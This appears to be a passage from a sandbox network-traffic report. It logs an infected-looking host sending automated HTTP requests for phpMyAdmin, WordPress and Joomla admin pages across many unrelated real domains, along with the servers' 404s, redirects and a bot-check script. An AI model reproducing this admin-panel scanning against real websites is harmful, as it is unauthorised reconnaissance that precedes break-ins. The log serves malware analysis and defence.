Feb 21, 2024 00:26:10.182734966 CET	439	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:10 GMT Server: Apache/2.4.18 (Ubuntu) Content-Length: 278 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 63 68 6f 6e 6f 6e 6c 69 6e 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at archononline.com Port 80</address></body></html>
Feb 21, 2024 00:26:10.456363916 CET	222	OUT	GET /wp-admin/ HTTP/1.1 Host: archononline.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: http://archononline.com/wp-login.php
Feb 21, 2024 00:26:10.563880920 CET	439	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:10 GMT Server: Apache/2.4.18 (Ubuntu) Content-Length: 278 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 63 68 6f 6e 6f 6e 6c 69 6e 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at archononline.com Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
183	192.168.2.6	57735	193.70.18.144	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:10.083926916 CET	161	OUT	GET / HTTP/1.1 Host: imp.ovh.net Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:10.250042915 CET	92	IN	HTTP/1.1 301 Moved Permanently content-length: 0 location: https://www.ovh.co.uk/mail/

Session ID	Source IP	Source Port	Destination IP	Destination Port
184	192.168.2.6	57778	103.224.182.253	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:10.089534998 CET	174	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: hotmail.fr.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:10.303519011 CET	432	IN	HTTP/1.1 200 OK date: Tue, 20 Feb 2024 23:26:10 GMT server: Apache set-cookie: __tad=1708471570.3901965; expires=Fri, 17-Feb-2034 23:26:10 GMT; Max-Age=315360000 vary: Accept-Encoding content-encoding: gzip content-length: 137 content-type: text/html; charset=UTF-8 connection: close Data Raw: 1f 8b 08 00 00 00 00 00 00 03 25 8e 41 12 c2 30 0c 03 cf f8 15 26 9c 43 78 80 9b 03 3f 71 db 94 16 02 e9 04 c3 d0 df e3 c6 3a 49 9e d1 5a 34 cb 33 47 00 9a 13 8f 11 48 16 c9 29 4e f5 cc 1f 0a 16 80 de 43 5d 56 41 d9 d6 d4 39 49 3f 09 77 fe b2 5d 9d 96 81 82 05 f3 86 52 d7 97 71 c3 fe 36 94 5c 6a e7 4e 53 93 c3 9d a0 f1 d2 a4 fd 03 1d bd c7 6b e6 d7 03 d1 7b 7d 18 f6 66 6c 2c 9b 07 7f 28 5c 82 ab a8 00 00 00 Data Ascii: %A0&Cx?q:IZ43GH)NC]VA9I?w]Rq6\jNSk{}fl,(\

Session ID	Source IP	Source Port	Destination IP	Destination Port
185	192.168.2.6	57781	81.169.145.143	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:10.110133886 CET	175	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: d-brinkmann.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:10.296663046 CET	355	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:10 GMT Server: Apache/2.4.58 (Unix) Content-Length: 196 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
186	192.168.2.6	57794	213.186.33.4	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:10.124834061 CET	176	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: art-paix-di.org Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:10.293596029 CET	432	IN	HTTP/1.1 404 Not Found date: Tue, 20 Feb 2024 23:26:10 GMT content-type: text/html; charset=iso-8859-1 content-length: 196 server: Apache x-iplb-request-id: BF60E3DE:E1C2_D5BA2104:0050_65D53512_D449:19A2 x-iplb-instance: 51886 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
187	192.168.2.6	57811	193.70.18.144	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:10.133255005 CET	161	OUT	GET / HTTP/1.1 Host: imp.ovh.net Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:10.301078081 CET	92	IN	HTTP/1.1 301 Moved Permanently content-length: 0 location: https://www.ovh.co.uk/mail/
Feb 21, 2024 00:26:12.312892914 CET	161	OUT	GET / HTTP/1.1 Host: imp.ovh.net Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:12.477883101 CET	92	IN	HTTP/1.1 301 Moved Permanently content-length: 0 location: https://www.ovh.co.uk/mail/

Session ID	Source IP	Source Port	Destination IP	Destination Port
188	192.168.2.6	57866	188.40.92.90	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:10.174827099 CET	168	OUT	GET /phpmyadmin/ HTTP/1.1 Host: joaz.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:10.352279902 CET	139	IN	HTTP/1.1 302 Found Location: https://www.domainmarkt.de/joaz.de Server: Caddy Date: Tue, 20 Feb 2024 23:26:10 GMT Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
189	192.168.2.6	57907	185.107.56.198	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:10.199685097 CET	276	OUT	GET /administrator/index.php HTTP/1.1 Host: att.com.ph Accept: / Accept-Encoding: deflate, gzip Cookie: sid=6d8cb5bc-d047-11ee-bf1a-b2ef032372ed User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: http://att.com.ph/administrator/
Feb 21, 2024 00:26:10.806732893 CET	785	IN	HTTP/1.1 200 OK accept-ch: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile cache-control: max-age=0, private, must-revalidate connection: close content-length: 494 content-type: text/html; charset=utf-8 date: Tue, 20 Feb 2024 23:26:10 GMT server: nginx Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4c 6f 61 64 69 6e 67 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 27 68 74 74 70 3a 2f 2f 61 74 74 2e 63 6f 6d 2e 70 68 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 69 6e 64 65 78 2e 70 68 70 3f 63 68 3d 31 26 6a 73 3d 65 79 4a 68 62 47 63 69 4f 69 4a 49 55 7a 49 31 4e 69 49 73 49 6e 52 35 63 43 49 36 49 6b 70 58 56 43 4a 39 2e 65 79 4a 68 64 57 51 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 56 34 63 43 49 36 4d 54 63 77 4f 44 51 33 4f 44 63 33 4d 43 77 69 61 57 46 30 49 6a 6f 78 4e 7a 41 34 4e 44 63 78 4e 54 63 77 4c 43 4a 70 63 33 4d 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 70 7a 49 6a 6f 78 4c 43 4a 71 64 47 6b 69 4f 69 49 79 64 58 46 79 59 6d 78 78 64 6a 51 35 59 32 68 6d 63 32 68 72 62 54 51 7a 64 48 4e 73 4e 44 67 69 4c 43 4a 75 59 6d 59 69 4f 6a 45 33 4d 44 67 30 4e 7a 45 31 4e 7a 41 73 49 6e 52 7a 49 6a 6f 78 4e 7a 41 34 4e 44 63 78 4e 54 63 77 4d 6a 63 31 4e 54 63 32 66 51 2e 69 5a 76 77 5a 4e 66 6e 4c 6f 6f 79 6b 68 43 44 77 6c 68 59 4f 64 63 67 62 76 47 72 55 33 4a 30 58 45 65 75 6c 67 41 41 6e 62 6f 26 73 69 64 3d 36 64 38 63 62 35 62 63 2d 64 30 34 37 2d 31 31 65 65 2d 62 66 31 61 2d 62 32 65 66 30 33 32 33 37 32 65 64 27 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>Loading...</title></head><body><script type='text/javascript'>window.location.replace('http://att.com.ph/administrator/index.php?ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTcwODQ3ODc3MCwiaWF0IjoxNzA4NDcxNTcwLCJpc3MiOiJKb2tlbiIsImpzIjoxLCJqdGkiOiIydXFyYmxxdjQ5Y2hmc2hrbTQzdHNsNDgiLCJuYmYiOjE3MDg0NzE1NzAsInRzIjoxNzA4NDcxNTcwMjc1NTc2fQ.iZvwZNfnLooykhCDwlhYOdcgbvGrU3J0XEeulgAAnbo&sid=6d8cb5bc-d047-11ee-bf1a-b2ef032372ed');</script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
190	192.168.2.6	57011	221.121.158.21	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:10.270309925 CET	177	OUT	GET /phpmyadmin/ HTTP/1.1 Host: houseguru.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:10.578080893 CET	1286	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:10 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Server: imunify360-webshield/1.21 Last-Modified: Tuesday, 20-Feb-2024 23:26:10 GMT Cache-Control: private, no-store, no-cache, must-revalidate, proxy-revalidate, max-age=0, s-maxage=0 cf-edge-cache: no-cache Data Raw: 35 35 34 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 3c 74 69 74 6c 65 3e 4f 6e 65 20 6d 6f 6d 65 6e 74 2c 20 70 6c 65 61 73 65 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 36 46 37 46 38 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 30 33 31 33 31 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 35 76 68 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 6c 65 61 73 65 20 77 61 69 74 20 77 68 69 6c 65 20 79 6f 75 72 20 72 65 71 75 65 73 74 20 69 73 20 62 65 69 6e 67 20 76 65 72 69 66 69 65 64 2e 2e 2e 3c 2f 68 31 3e 0a 3c 66 6f 72 6d 20 69 64 3d 22 77 73 69 64 63 68 6b 2d 66 6f 72 6d 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 20 61 63 74 69 6f 6e 3d 22 2f 7a 30 66 37 36 61 31 64 31 34 66 64 32 31 61 38 66 62 35 66 64 30 64 30 33 65 30 66 64 63 33 64 33 63 65 64 61 65 35 32 66 22 20 6d 65 74 68 6f 64 3d 22 67 65 74 22 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 77 73 69 64 63 68 6b 22 20 6e 61 6d 65 3d 22 77 73 69 64 63 68 6b 22 2f 3e 0a 3c 2f 66 6f 72 6d 3e 0a 3c 73 63 72 69 70 74 3e 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 20 20 20 20 76 61 72 20 77 65 73 74 3d 2b 28 28 2b 21 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 5b 5d 29 29 2c 0a 20 20 20 20 20 20 20 20 65 61 73 74 3d 2b 28 28 2b 21 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b Data Ascii: 554<!doctype html><html><head><meta charset="utf-8"><meta name="robots" content="noindex, nofollow"><title>One moment, please...</title><style>body { background: #F6F7F8; color: #303131; font-family: sans-serif; margin-top: 45vh; text-align: center;}</style></head><body><h1>Please wait while your request is being verified...</h1><form id="wsidchk-form" style="display:none;" action="/z0f76a1d14fd21a8fb5fd0d03e0fdc3d3cedae52f" method="get"><input type="hidden" id="wsidchk" name="wsidchk"/></form><script>(function(){ var west=+((+!+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![])+(+!+[]+[])), east=+((+!+[])+(+!+[]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![])+(+!+[]+!![]+!![]+[])+(+![])+(+!+[]+!![]+!![
Feb 21, 2024 00:26:10.578088045 CET	425	IN	Data Raw: 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 29 2c 0a 20 20 20 20 20 20 20 20 78 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 21 21 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3b 7d Data Ascii: ]+!![]+!![]+!![]+[])), x=function(){try{return !!window.addEventListener;}catch(e){return !!0;} }, y=function(y,z){x() ? document.addEventListener("DOMContentLoaded",y,z) : document.attachEvent("onreadystatechange",y);}; y(
Feb 21, 2024 00:26:10.578099012 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
191	192.168.2.6	58279	15.197.204.56	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:10.336754084 CET	171	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: att.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:10.435117006 CET	221	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:10 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://att.com.au/phpMyAdmin/ ETag: "65d0dd59-0"

Session ID	Source IP	Source Port	Destination IP	Destination Port
192	192.168.2.6	58358	45.136.114.149	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:10.382273912 CET	177	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: archononline.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:10.490215063 CET	439	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:10 GMT Server: Apache/2.4.18 (Ubuntu) Content-Length: 278 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 63 68 6f 6e 6f 6e 6c 69 6e 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at archononline.com Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
193	192.168.2.6	58442	75.2.70.75	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:10.385258913 CET	172	OUT	GET /phpmyadmin/ HTTP/1.1 Host: eyegage.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:10.482006073 CET	349	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:10 GMT Content-Type: text/html Content-Length: 166 Connection: keep-alive Location: https://eyegage.com/phpmyadmin Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>
Feb 21, 2024 00:26:10.688863039 CET	349	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:10 GMT Content-Type: text/html Content-Length: 166 Connection: keep-alive Location: https://eyegage.com/phpmyadmin Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
194	192.168.2.6	58196	78.47.2.70	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:10.391743898 CET	184	OUT	GET /wp-login.php HTTP/1.1 Host: breecetechnology.co.za Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:10.579067945 CET	212	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:10 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 31 30 0d 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 10File not found.0
Feb 21, 2024 00:26:10.675709963 CET	234	OUT	GET /wp-admin/ HTTP/1.1 Host: breecetechnology.co.za Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: http://breecetechnology.co.za/wp-login.php
